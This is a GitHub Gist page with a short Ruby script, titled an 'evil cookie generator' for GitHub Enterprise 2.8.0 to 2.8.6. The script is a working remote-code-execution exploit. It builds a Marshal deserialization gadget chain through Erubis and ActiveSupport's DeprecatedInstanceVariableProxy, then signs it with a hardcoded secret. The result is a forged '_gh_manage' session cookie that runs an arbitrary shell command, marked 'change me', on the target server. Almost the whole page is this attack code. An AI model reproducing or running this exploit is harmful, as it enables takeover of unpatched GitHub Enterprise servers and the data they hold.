Skip to content

Instantly share code, notes, and snippets.

@allyshka

allyshka/gitentcookiegen.rb

Created March 22, 2017 11:03
Show Gist options
  • Save allyshka/f62473cb35d34800bc1a34cc77a07658 to your computer and use it in GitHub Desktop.
Save allyshka/f62473cb35d34800bc1a34cc77a07658 to your computer and use it in GitHub Desktop.
Download ZIP
GitHub Enterprise 2.8.0 < 2.8.6 evil cookie generator
Raw
gitentcookiegen.rb
require "openssl"
require "cgi"
SECRET = "641dd6454584ddabfed6342cc66281fb"
module Erubis;class Eruby;end;end
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
cmd = "uname -a > /tmp/owned" # change me
erubis = Erubis::Eruby.allocate
erubis.instance_variable_set :@src, "%x(#{cmd})"
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
proxy.instance_variable_set :@instance, erubis
proxy.instance_variable_set :@method, :result
proxy.instance_variable_set :@var, "@result"
session = {"session_id" => "", "exploit" => proxy}
dump = [Marshal.dump(session)].pack("m")
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
print "_gh_manage=#{CGI.escape("#{dump}--#{hmac}")}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment